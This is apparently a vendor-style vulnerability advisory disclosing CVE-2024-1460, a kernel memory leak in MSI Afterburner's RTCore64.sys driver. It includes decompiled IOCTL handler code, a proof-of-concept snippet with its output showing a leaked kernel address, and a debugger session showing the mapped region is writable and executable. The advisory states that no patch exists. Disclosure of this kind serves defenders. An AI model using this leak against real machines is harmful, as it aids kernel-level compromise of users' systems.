MSI Afterburner v4.6.5.16370 - KM Leak

Summary

NameMSI Afterburner v4.6.5.16370 - Kernel Memory Leak
Code nameMingus
ProductMSI Afterburner
VendorMicro-Star INT'L CO.
Affected versionsVersion 4.6.5.16370
StatePublic
Release date2024-03-06

Vulnerability

KindKernel Memory Leak
Rule037. Technical Information Leak
RemoteNo
CVSSv3 VectorCVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H
CVSSv3 Base Score5.6
Exploit availableYes
CVE ID(s)CVE-2024-1460

Description

MSI Afterburner v4.6.5.16370 is vulnerable to a Kernel Memory Leak vulnerability by triggering the 0x80002040 IOCTL code of the RTCore64.sys driver.

Vulnerability

The 0x80002040 IOCTL code of the RTCore64.sys driver allows map up to 0x20000 of a physical address from range 0xC0000 to 0xE0000 on a non-paged virtual kernel memory range whose address can be leaked. That physical range is commonly used to store BIOS information of the device's motherboard.

The handling decompiled code of the 0x80002040 IOCTL starts with:

case 0x80002040:
 if ( Options == 0x30 ) // [1]
 {
 v33 = sub_11388(SystemBuffer); // [2]
 pIrp->IoStatus.Status = v33;

At [1] a check is made on the InputBufferLength parameter of the IOCTL request call. If it's equal to 0x30 bytes, the function sub_11388 is called at [2] with the SystemBuffer as a parameter.

Inside sub_11388, a call to sub_11044 is performed and the code checks if the returned value is not NULL:

if ( !sub_11044(*(_QWORD *)SystemBuffer, *(_DWORD *)(SystemBuffer + 0x10), (ULONG *)(SystemBuffer + 0x20)) )
    return 0xC0000001i64;

The only condition that returns not NULL at sub_11044 is:

if ( SystemBuffer >= 0xC0000 && SystemBuffer + PhysAddressOffset <= 0xE0000 )
    return 1;

After that check the code that follows on sub_11388 is:

pSystemBuffer = *(_QWORD *)SystemBuffer;
AddressSpace = 0;
if ( !HalTranslateBusAddress(Isa, 0, (PHYSICAL_ADDRESS)pSystemBuffer, &AddressSpace, &PhysicalAddress) )
    return 0xC000009Ai64;
v4 = MmMapIoSpace(PhysicalAddress, *(unsigned int *)(SystemBuffer + 0x10), MmNonCached);  // [1]
if ( !v4 )
    return 0xC000009Ai64;
*(_QWORD *)(SystemBuffer + 8) = v4;  // [2]

At [1] the code uses MmMapIoSpace() to map the physical address range from 0xC0000 up to the offset passed on SystemBuffer + 0x10. At [2] the code writes to SystemBuffer + 0x8 the address returned by MmMapIoSpace().

A snipped of the Proof-of-Concept that passes all the checks is:

SIZE_T inputSize = 0x30;
...
ULONGLONG outbuf_allocation_addr = 0x00000000000C0000;
...
((PDWORD64)((DWORD64)inBuf + 0x0))[0] = (ULONGLONG)outBuf;
((PDWORD64)((DWORD64)inBuf + 0x10))[0] = (ULONGLONG)0x000000000001F000;

The output of the Proof-of-Concept is:

PS C:\Users\admin\Desktop> .\PoC.exe

[+] Bytes sent: 48 (0x30)
[+] Bytes returned: 48 (0x30)
[+] Leaked address FFFF9F80C64C0000 (SystemBuffer + 0x8)
[+] Output (0): 00000000000C0000
[+] Output (8): FFFF9F80C64C0000
[+] Output (16): 000000000001F000
[+] Output (24): 4444444444444444
[+] Output (32): 4545454545454545
[+] Output (40): 0000000146464646

In the debugging session, the contents of the mapped address can be seen. It contains strings like VESA and VBE2 which are part of the BIOS of the GPU's motherboard used. The mapped address is also executable E(1) and writable W(1):

0: kd> !process 0 0 poc.exe
PROCESS ffffb30d35432080
 SessionId: 1 Cid: 1354 Peb: a4c8e97000 ParentCid: 08bc
 DirBase: 1479d1000 ObjectTable: ffff8c0ee3f5d8c0 HandleCount: 43.
 Image: PoC.exe

0: kd> ba e1 /p ffffb30d35432080 rtcore64+13df
0: kd> g
Breakpoint 0 hit
RTCore64+0x13df:
fffff807`715b13df ff154b1c0000 call qword ptr [RTCore64+0x3030 (fffff807`715b3030)]
1: kd> dps fffff807`715b3030 L1
fffff807`715b3030 fffff807`7555f0b0 nt!MmMapIoSpace
1: kd> p
RTCore64+0x13e5:
fffff807`715b13e5 4885c0 test rax,rax
1: kd> dc @rax L50
ffff9f80`c64c0000 cb80aa55 804f05b8 097400fc 0f4ffc80 U.....O...t...O.
ffff9f80`c64c0010 cf00ac84 0f033ccf 3c00a084 60f57512 .....<.....<.u.`
ffff9f80`c64c0020 40ba5066 01b86620 66000000 c8fe42ef fP.@ f.....f.B..
ffff9f80`c64c0030 5866ef66 b003c2ba c6baeee3 eeffb003 f.fX............
ffff9f80`c64c0040 3103c8ba b942eec0 82e80040 e2c4fe03 ...1..B.@.......
ffff9f80`c64c0050 0473bff9 ba0005b9 66e803c4 04a6bf03 ..s........f....
ffff9f80`c64c0060 ba0009b9 5ae803ce 0491bf03 ba0015b9 .......Z........
ffff9f80`c64c0070 c0bb03da 50c03003 da8758ec 8a2e50ee .....0.P.X...P..
ffff9f80`c64c0080 58ee4705 da87c0fe 87ecede2 ee20b0da .G.X.......... .
ffff9f80`c64c0090 b90478bf d4ba0019 7f11b803 1165222e .x..........."e.
ffff9f80`c64c00a0 031fe8ef a000b806 bffcc08e 00b90000 ................
ffff9f80`c64c00b0 f3c03180 b86107ab b8cf0050 3ccf0050 .1....a.P...P..<
ffff9f80`c64c00c0 3c1c7400 88840f01 0f023c00 3c01a884 .t.<.....<.....<
ffff9f80`c64c00d0 2e840f03 0f093c02 b8023184 66cf014f .....<...1..O..f
ffff9f80`c64c00e0 c08c1e50 8b66d88e 562d6605 66324542 P.....f..f-VBE2f
ffff9f80`c64c00f0 455605c7 45c74153 c7020004 04af0645 ..VESA.E....E...
ffff9f80`c64c0100 66084d8c 030a45c7 c7000000 05900e45 .M.f.E......E...
ffff9f80`c64c0110 66104d8c 400000b8 e8c16600 12458910 .M.f...@.f....E.
ffff9f80`c64c0120 001445c7 1645c701 4d8c04b6 1a45c718 .E....E....M..E.
ffff9f80`c64c0130 4d8c04bd 1e45c71c 4d8c04cb 2245c720 ...M..E....M .E"
0: kd> !ptev2(0xffff9f80c64c0000)
Virtual address: -106099545210880
Pml 4 address: 0x2e6d68000
Level: 4, Entry Address: 0x2e6d689f8
Value = 0xa00000004731863
    P(1), W(1), E(1), A(1), D(1), K(1), Large(0)
    Pfn: 0x4731

Level: 3, Entry Address: 0x4731018
Value = 0xa00000004732863
    P(1), W(1), E(1), A(1), D(1), K(1), Large(0)
    Pfn: 0x4732

Level: 2, Entry Address: 0x4732190
Value = 0xa000002e8a85863
    P(1), W(1), E(1), A(1), D(1), K(1), Large(0)
    Pfn: 0x2e8a85

Level: 1, Entry Address: 0x2e8a85600
Value = 0xa000000000c0b63
    P(1), W(1), E(1), A(1), D(1), K(1), Large(0)
    Pfn: 0xc0

Our security policy

We have reserved the ID CVE-2024-1460 to refer to this issue from now on.

System Information

  • Version: MSI Afterburner v4.6.5.16370
  • Operating System: Windows

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Andres Roldan from Fluid Attacks' Offensive Team.

References

Vendor page https://us.msi.com/

Product page https://www.msi.com/Landing/afterburner/graphics-cards

Timeline

Time-lapse-logo

2024-02-08

Vulnerability discovered.

Time-lapse-logo

2024-02-23

Vendor contacted.

Time-lapse-logo

2024-03-06

Public Disclosure.

Fluid Logo Footer

Hacking software for over 20 years

Fluid Attacks tests applications and other systems, covering all software development stages. Our team assists clients in quickly identifying and managing vulnerabilities to reduce the risk of incidents and deploy secure technology.

Copyright © 0 Fluid Attacks. We hack your software. All rights reserved.